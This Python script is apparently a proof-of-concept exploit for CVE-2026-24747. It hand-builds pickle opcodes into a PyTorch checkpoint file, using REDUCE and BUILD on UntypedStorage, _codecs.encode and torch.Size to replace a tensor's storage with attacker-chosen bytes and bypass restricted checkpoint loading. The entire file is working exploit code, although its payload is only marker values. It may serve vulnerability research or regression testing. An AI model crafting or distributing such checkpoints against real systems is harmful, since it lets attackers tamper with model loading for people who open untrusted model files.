#!/usr/bin/env python3
"""
CVE-2026-24747 Variant: BUILD + REDUCE UntypedStorage Bypass

Uses nested REDUCE chains within a MARK scope to build the state tuple
for BUILD without leftover stack values.
"""

import io
import struct
import zipfile
import sys

def build_binunicode(s):
    from pickle import BINUNICODE
    encoded = s.encode('utf-8')
    return BINUNICODE + struct.pack('<I', len(encoded)) + encoded

def create_exploit_checkpoint(output_path, payload_size=40):
    from pickle import (
        PROTO, GLOBAL, MARK, BINUNICODE, BINPUT, BINGET, BININT, BININT1,
        TUPLE, TUPLE1, TUPLE2, TUPLE3, BINPERSID, NEWFALSE, REDUCE, BUILD,
        SETITEM, STOP, EMPTY_TUPLE, BINFLOAT, EMPTY_DICT
    )
    
    MAGIC_VALUES = [
        1337.0, 31337.0, 42.0, 57005.0, 48879.0,
        51966.0, 47806.0, 64206.0, 9999.99, 12345.0,
    ]
    while len(MAGIC_VALUES) < payload_size:
        MAGIC_VALUES.append(float(len(MAGIC_VALUES) * 111))
    MAGIC_VALUES = MAGIC_VALUES[:payload_size]
    
    payload_bytes = struct.pack('<' + 'f' * payload_size, *MAGIC_VALUES)
    payload_str = ''.join(chr(b) for b in payload_bytes)
    
    legit_storage = struct.pack('<ffff', 0.0, 0.0, 0.0, 0.0)
    
    pkl = bytearray()
    pkl += PROTO + b'\x02'
    
    # Outer wrapper: we'll use a dict that holds the tensor
    # Strategy: Create everything we need for BUILD inside MARK scopes,
    # using nested constructions so no extra values are on the main stack.
    
    pkl += EMPTY_DICT
    pkl += BINPUT + b'\x00'
    
    pkl += build_binunicode('weights')
    pkl += BINPUT + b'\x01'
    
    # === Create the tensor ===
    pkl += GLOBAL + b'torch._utils\n_rebuild_tensor_v2\n'
    pkl += BINPUT + b'\x02'
    pkl += MARK  # args for _rebuild_tensor_v2
    
    # Storage (persistent load)
    pkl += MARK
    pkl += build_binunicode('storage')
    pkl += BINPUT + b'\x03'
    pkl += GLOBAL + b'torch\nFloatStorage\n'
    pkl += BINPUT + b'\x04'
    pkl += build_binunicode('0')
    pkl += BINPUT + b'\x05'
    pkl += build_binunicode('cpu')
    pkl += BINPUT + b'\x06'
    pkl += BININT1 + b'\x04'     # numel=4
    pkl += TUPLE
    pkl += BINPUT + b'\x07'
    pkl += BINPERSID
    
    pkl += BININT1 + b'\x00'     # offset
    pkl += BININT1 + b'\x04'     # size=(4,)
    pkl += TUPLE1
    pkl += BINPUT + b'\x08'
    pkl += BININT1 + b'\x01'     # stride=(1,)
    pkl += TUPLE1
    pkl += BINPUT + b'\x09'
    pkl += NEWFALSE              # requires_grad
    
    # backward_hooks = OrderedDict()
    pkl += GLOBAL + b'collections\nOrderedDict\n'
    pkl += BINPUT + b'\x0a'
    pkl += EMPTY_TUPLE
    pkl += REDUCE
    pkl += BINPUT + b'\x0b'
    
    pkl += TUPLE                 # Close args for _rebuild_tensor_v2
    pkl += BINPUT + b'\x0c'
    pkl += REDUCE                # -> tensor (shape 4)
    pkl += BINPUT + b'\x0d'
    
    # Now stack = [dict, 'weights', tensor]
    
    # === BUILD state tuple ===
    # We need: (UntypedStorage_with_payload, 0, torch.Size([payload_size]), (1,))
    # 
    # The trick: Use TUPLE to build the tuple from exactly 4 elements
    # on a MARK scope. Each element is either a simple value or a 
    # REDUCE-computed value (which replaces the function on stack[-1]).
    #
    # Inside MARK scope:
    # 1. Push UntypedStorage (via nested REDUCE chain) 
    # 2. Push 0
    # 3. Push torch.Size([N]) (via nested REDUCE)
    # 4. Push (1,) via TUPLE1
    # Then TUPLE closes with exactly 4 elements.
    
    pkl += MARK  # Start of state tuple
    
    # Element 1: UntypedStorage(encode(payload_str, 'latin-1'))
    # This is a nested REDUCE:
    #   GLOBAL UntypedStorage
    #   GLOBAL encode  
    #   ... REDUCE (encode) ... TUPLE1 ... REDUCE (UntypedStorage)
    #
    # But GLOBAL pushes on stack, REDUCE replaces stack[-1].
    # Within MARK scope, everything pushed goes into the scope.
    # So we need to be careful.
    #
    # Let's use a different approach: build the encode result,
    # wrap it in TUPLE1 for UntypedStorage arg, then REDUCE.
    
    pkl += GLOBAL + b'torch.storage\nUntypedStorage\n'   # push class
    pkl += BINPUT + b'\x14'
    
    # Now we need the bytes arg. Build via _codecs.encode
    pkl += GLOBAL + b'_codecs\nencode\n'                 # push encode func
    pkl += BINPUT + b'\x10'
    pkl += build_binunicode(payload_str)                  # push string
    pkl += BINPUT + b'\x11'
    pkl += build_binunicode('latin-1')                    # push encoding
    pkl += BINPUT + b'\x12'
    pkl += TUPLE2                                         # (string, encoding)
    pkl += REDUCE                                         # -> bytes (replaces encode func)
    pkl += BINPUT + b'\x13'
    
    pkl += TUPLE1                                         # (bytes,)
    pkl += REDUCE                                         # UntypedStorage(bytes) - replaces class
    pkl += BINPUT + b'\x15'
    
    # Now in the MARK scope: [UntypedStorage_instance]
    
    # Element 2: offset = 0
    pkl += BININT1 + b'\x00'
    
    # Element 3: torch.Size([payload_size])
    pkl += GLOBAL + b'torch\nSize\n'                      # push Size class
    pkl += BINPUT + b'\x16'
    pkl += BININT + struct.pack('<i', payload_size)       # push int
    pkl += TUPLE1                                          # (payload_size,)
    pkl += TUPLE1                                          # ((payload_size,),)
    pkl += REDUCE                                          # Size([payload_size]) - replaces class
    pkl += BINPUT + b'\x17'
    
    # Element 4: stride = (1,)
    pkl += BININT1 + b'\x01'
    pkl += TUPLE1
    
    pkl += TUPLE  # Close state: (storage, 0, Size([N]), (1,))
    pkl += BINPUT + b'\x19'
    
    # === BUILD ===
    pkl += BUILD   # tensor.set_(*state)
    
    # dict['weights'] = tensor
    pkl += SETITEM
    pkl += STOP
    
    output = io.BytesIO()
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr('archive/data.pkl', bytes(pkl))
        zf.writestr('archive/data/0', legit_storage)
        zf.writestr('archive/version', '3\n')
        zf.writestr('archive/byteorder', 'little')
        zf.writestr('archive/.format_version', '1')
        zf.writestr('archive/.storage_alignment', '64')
        zf.writestr('archive/.data/serialization_id', '0' * 40)
    
    with open(output_path, 'wb') as f:
        f.write(output.getvalue())
    
    return MAGIC_VALUES

if __name__ == '__main__':
    output_path = sys.argv[1] if len(sys.argv) > 1 else '/tmp/cve_2026_24747_bypass.pth'
    expected = create_exploit_checkpoint(output_path)
    print(f"Created: {output_path}")
    print(f"Expected: {expected[:10]}")
